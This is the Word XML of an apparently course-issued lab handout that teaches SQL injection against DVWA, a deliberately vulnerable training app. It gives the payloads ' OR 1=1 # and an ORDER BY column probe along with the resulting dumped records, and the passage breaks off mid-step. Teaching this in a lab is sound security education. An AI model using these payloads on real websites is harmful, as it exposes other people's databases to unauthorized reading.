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279C" w14:textId="2B98F9B0" w:rsidR="00D778DF" w:rsidRPr="00750A25" w:rsidRDefault="00EE6C17" w:rsidP="00750A25">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006623D9">
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidR="0020022B" w:rsidRPr="006623D9">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="006623D9">
        <w:t xml:space="preserve"> Injection Attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C7547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537BE501" w14:textId="48C1022C" w:rsidR="00E70096" w:rsidRPr="00E70096" w:rsidRDefault="00251F07" w:rsidP="00E70096">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Websites that are connected to </w:t>
      </w:r>
      <w:r w:rsidR="001D58B8">
        <w:t xml:space="preserve">backend databases can be vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="005F73BC">
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="001D58B8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F73BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D58B8">
        <w:t>In a SQL injection exploit</w:t>
      </w:r>
      <w:r w:rsidR="00DE77F2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001D58B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F73BC">
        <w:t>an attacker enter</w:t>
      </w:r>
      <w:r w:rsidR="001D58B8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005F73BC">
        <w:t xml:space="preserve"> malicious queries </w:t>
      </w:r>
      <w:r w:rsidR="000E174D">
        <w:t xml:space="preserve">that interact with </w:t>
      </w:r>
      <w:r w:rsidR="001D58B8">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005F73BC">
        <w:t>application database</w:t>
      </w:r>
      <w:r w:rsidR="00E70096">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0090337A">
        <w:t xml:space="preserve">In this lab, </w:t>
      </w:r>
      <w:r w:rsidR="000E174D">
        <w:t xml:space="preserve">you will </w:t>
      </w:r>
      <w:r w:rsidR="0090337A">
        <w:t xml:space="preserve">exploit a </w:t>
      </w:r>
      <w:r w:rsidR="000E174D">
        <w:t xml:space="preserve">web site </w:t>
      </w:r>
      <w:r w:rsidR="0090337A">
        <w:t>vulnerability with SQL injection and research SQL injection mitigation</w:t>
      </w:r>
      <w:r w:rsidR="00E70096">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662A6C3" w14:textId="23C4882F" w:rsidR="008B4F81" w:rsidRDefault="007D4226" w:rsidP="008B4F81">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part </w:t>
      </w:r>
      <w:r w:rsidR="003D759C">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00733DD3">
        <w:t>Exploit</w:t>
      </w:r>
      <w:r w:rsidR="007C55BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C94ED3">
        <w:t xml:space="preserve">an SQL </w:t>
      </w:r>
      <w:r w:rsidR="00EB3354">
        <w:t xml:space="preserve">Injection </w:t>
      </w:r>
      <w:r w:rsidR="00C94ED3">
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00733DD3">
        <w:t xml:space="preserve"> on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F39113" w14:textId="01F126F3" w:rsidR="00EE00D9" w:rsidRPr="004C0909" w:rsidRDefault="007D4226" w:rsidP="008B4F81">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part </w:t>
      </w:r>
      <w:r w:rsidR="003D759C">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EE00D9">
        <w:t xml:space="preserve">Research SQL Injection Mitigation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A446FB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38C3534B" w14:textId="08832F2B" w:rsidR="00F14148" w:rsidRDefault="00657FEC" w:rsidP="00E8306D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve">SQL injection </w:t>
      </w:r>
      <w:r w:rsidR="00A42A43">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> common attack used by hackers to exploit SQL database-driven web application</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>This type of attack involves inserting</w:t>
      </w:r>
      <w:r w:rsidR="000A28C3">
        <w:t xml:space="preserve"> malicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t>SQL code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t>statements in</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00186216">
        <w:t>an input</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> field </w:t>
      </w:r>
      <w:r w:rsidR="00CD209B">
        <w:t xml:space="preserve">or URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:t>the goal</w:t>
      </w:r>
      <w:r w:rsidR="00D33EC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00DE77F2">
        <w:t xml:space="preserve">reveling or </w:t>
      </w:r>
      <w:r w:rsidR="00F14148">
        <w:t>manipulating</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> the database contents, caus</w:t>
      </w:r>
      <w:r w:rsidR="00F3640F">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> repudiation</w:t>
      </w:r>
      <w:r w:rsidR="00D33EC1">
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> issues, </w:t>
      </w:r>
      <w:r w:rsidR="00CD209B">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t>spoof</w:t>
      </w:r>
      <w:r w:rsidR="00D33EC1">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00657FEC">
        <w:t xml:space="preserve"> identit</w:t>
      </w:r>
      <w:r w:rsidR="00D33EC1">
        <w:t>ies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C2387" w14:textId="4FFD055B" w:rsidR="00D778DF" w:rsidRPr="00F14148" w:rsidRDefault="00D778DF" w:rsidP="00F14148">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14148">
        <w:t>Required Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD3B40" w14:textId="370AF8AE" w:rsidR="00334C33" w:rsidRDefault="00733DD3" w:rsidP="00CD6B9D">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali VM customized for </w:t>
      </w:r>
      <w:r w:rsidR="002C02F2">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Ethical Hacker course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D00526C" w14:textId="10C73A83" w:rsidR="00733DD3" w:rsidRPr="00CD6B9D" w:rsidRDefault="00733DD3" w:rsidP="00CD6B9D">
      <w:pPr>
        <w:pStyle w:val="Bulletlevel1"/>
      </w:pPr>
      <w:r>
        <w:t>Internet access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26455462" w14:textId="4BB51FD3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4CC304E6" w14:textId="5E3120BD" w:rsidR="00103401" w:rsidRDefault="00C94ED3" w:rsidP="009A3FCF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit an SQL</w:t>
      </w:r>
      <w:r w:rsidR="00EB3354">
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerability on DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF38514" w14:textId="34022CCB" w:rsidR="00411943" w:rsidRDefault="00411943" w:rsidP="008051E0">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection is a code injection technique used to exploit security vulnerabilities in the database layer of an application. These </w:t>
      </w:r>
      <w:r w:rsidRPr="008051E0">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could allow an attacker to execute </w:t>
      </w:r>
      <w:r w:rsidR="00527C58">
        <w:t xml:space="preserve">malicious </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL commands </w:t>
      </w:r>
      <w:r w:rsidR="00527C58">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> compromise the security of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D31D9" w14:textId="15072038" w:rsidR="00527C58" w:rsidRPr="00411943" w:rsidRDefault="00527C58" w:rsidP="00411943">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>In this part you will exploit a SQL vulnerability on the DVWA</w:t>
      </w:r>
      <w:r w:rsidR="008051E0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD73F7" w14:textId="1B2B9196" w:rsidR="00FB60D3" w:rsidRDefault="00FB60D3" w:rsidP="00FB60D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prepare DVWA for SQL </w:t>
      </w:r>
      <w:r w:rsidR="0049354A">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">njection </w:t>
      </w:r>
      <w:r w:rsidR="0049354A">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>xploit</w:t>
      </w:r>
      <w:r w:rsidR="00361857">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426BF02" w14:textId="5C3E47A9" w:rsidR="00FB60D3" w:rsidRDefault="00FB60D3" w:rsidP="00FB60D3">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidR="00D50241">
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> browser and navigate to</w:t>
      </w:r>
      <w:r w:rsidR="00527C58">
        <w:t xml:space="preserve"> the DVWA at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00BC5192">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.6.6.13</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C85451">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7D893" w14:textId="4F7F7993" w:rsidR="00FB60D3" w:rsidRDefault="00FB60D3" w:rsidP="00FB60D3">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter the credentials: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D2879">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="003D2879">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00C85451">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB45E6C" w14:textId="6867E839" w:rsidR="00FB60D3" w:rsidRDefault="00365156" w:rsidP="00FB60D3">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Set DVWA to Low Security</w:t>
      </w:r>
      <w:r w:rsidR="00C85451">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210AB0B4" w14:textId="6E01A0B7" w:rsidR="00FB60D3" w:rsidRDefault="00365156" w:rsidP="00FB60D3">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00C85451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DVWA Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the left pane</w:t>
      </w:r>
      <w:r w:rsidR="00C85451">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2421C0B1" w14:textId="64C82A0A" w:rsidR="00C85451" w:rsidRDefault="00C85451" w:rsidP="00FB60D3">
      <w:pPr>
        <w:pStyle w:val="SubStepNum"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the security level to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C85451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00C85451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9F1BF" w14:textId="75A905C0" w:rsidR="00C85451" w:rsidRDefault="00C85451" w:rsidP="00C85451">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Check</w:t>
      </w:r>
      <w:r w:rsidR="005B075F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5907">
        <w:t xml:space="preserve">DVWA to see if </w:t>
      </w:r>
      <w:r w:rsidR="00C66AFF">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="006C5907">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="0049354A">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00C66AFF">
        <w:t xml:space="preserve">njection </w:t>
      </w:r>
      <w:r w:rsidR="0049354A">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="006C5907">
        <w:t xml:space="preserve">ulnerability is </w:t>
      </w:r>
      <w:r w:rsidR="0049354A">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="006C5907">
        <w:t>resent</w:t>
      </w:r>
      <w:r w:rsidR="00361857">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F775D0" w14:textId="63AF6019" w:rsidR="006C5907" w:rsidRDefault="006C5907" w:rsidP="006C5907">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5907">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A068D3A" w14:textId="1E9D2D62" w:rsidR="006C5907" w:rsidRPr="00E0525A" w:rsidRDefault="006C5907" w:rsidP="006C5907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</w:t>
      </w:r>
      <w:r w:rsidR="00C66AFF">
        <w:t xml:space="preserve">field </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r w:rsidR="00353809" w:rsidRPr="0092461A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="007D2577" w:rsidRPr="0092461A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0092461A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR 1=1 #</w:t>
      </w:r>
      <w:r w:rsidR="00E0525A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E0525A" w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>and click</w:t>
      </w:r>
      <w:r w:rsidR="00E0525A" w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidR="00E0525A" w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC107FB" w14:textId="10C279F0" w:rsidR="006C5907" w:rsidRDefault="004A2210" w:rsidP="006C5907">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>You should receive the output shown below. The output confirms</w:t>
      </w:r>
      <w:r w:rsidR="00396057">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there is </w:t>
      </w:r>
      <w:r w:rsidR="0091617B">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerability present</w:t>
      </w:r>
      <w:r w:rsidR="00396057">
        <w:t xml:space="preserve"> that permits execution of SQL statements that are entered directly into input fields</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A2479" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>ID: ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182259F2" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>First name: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19070933" w14:textId="36F1A153" w:rsidR="00135782" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>Surname: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C31EB1" w14:textId="77777777" w:rsidR="00236B76" w:rsidRPr="00135782" w:rsidRDefault="00236B76" w:rsidP="00CD4DDB">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4999CB76" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>ID: ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2DDAAE" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>First name: Gordon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8B01C" w14:textId="7A459339" w:rsidR="00135782" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>Surname: Brown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615005AF" w14:textId="77777777" w:rsidR="00236B76" w:rsidRPr="00135782" w:rsidRDefault="00236B76" w:rsidP="00CD4DDB">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C85455" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>ID: ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC405F2" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>First name: Hack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08890010" w14:textId="1AD31B1E" w:rsidR="00135782" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>Surname: Me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA1262" w14:textId="77777777" w:rsidR="00236B76" w:rsidRPr="00135782" w:rsidRDefault="00236B76" w:rsidP="00CD4DDB">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D06463C" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>ID: ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC5696" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>First name: Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD409C8" w14:textId="6EA2E5AD" w:rsidR="00135782" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>Surname: Picasso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B827B1" w14:textId="77777777" w:rsidR="00236B76" w:rsidRPr="00135782" w:rsidRDefault="00236B76" w:rsidP="00CD4DDB">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CE2D54" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>ID: ' or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B8174" w14:textId="77777777" w:rsidR="00236B76" w:rsidRDefault="00135782" w:rsidP="00236B76">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>First name: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387F854" w14:textId="433EFF54" w:rsidR="00135782" w:rsidRDefault="00135782">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00135782">
        <w:t>Surname: Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD3878" w14:textId="6ABE0B3C" w:rsidR="00C55F03" w:rsidRPr="00135782" w:rsidRDefault="00C55F03" w:rsidP="00CD4DDB">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You have </w:t>
      </w:r>
      <w:r w:rsidR="00BD654F">
        <w:t xml:space="preserve">entered an “always true” expression that was executed by the database server. The result is that all entries in the ID </w:t>
      </w:r>
      <w:r w:rsidR="007A4687">
        <w:t>field of the database</w:t>
      </w:r>
      <w:r w:rsidR="00BD654F">
        <w:t xml:space="preserve"> were </w:t>
      </w:r>
      <w:r w:rsidR="0009207E">
        <w:t>returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F94A5F" w14:textId="4CEF1955" w:rsidR="004A2210" w:rsidRDefault="004A2210" w:rsidP="004A2210">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:r w:rsidR="003A7BF4">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>umber</w:t>
      </w:r>
      <w:r w:rsidR="003F143C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="003A7BF4">
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ields in the </w:t>
      </w:r>
      <w:r w:rsidR="003A7BF4">
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>uery</w:t>
      </w:r>
      <w:r w:rsidR="00DE5EB7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126EF320" w14:textId="2E0C2733" w:rsidR="00C81D67" w:rsidRDefault="00C81D67" w:rsidP="00C81D67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</w:t>
      </w:r>
      <w:r w:rsidR="00F8304D">
        <w:t>ield</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73705">
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003C0B4F" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY 1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>and click</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C853480" w14:textId="09F46A41" w:rsidR="003A0067" w:rsidRDefault="003A0067" w:rsidP="003A0067">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha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t>You should rece</w:t>
      </w:r>
      <w:r w:rsidR="00F8304D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>ive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA9992" w14:textId="12F49C2D" w:rsidR="00177321" w:rsidRPr="00177321" w:rsidRDefault="00177321" w:rsidP="003F143C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00177321">
        <w:t>ID: 1</w:t>
      </w:r>
      <w:r w:rsidR="003C0B4F">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve"> OR</w:t>
      </w:r>
      <w:r>
        <w:t>DER BY</w:t>
      </w:r>
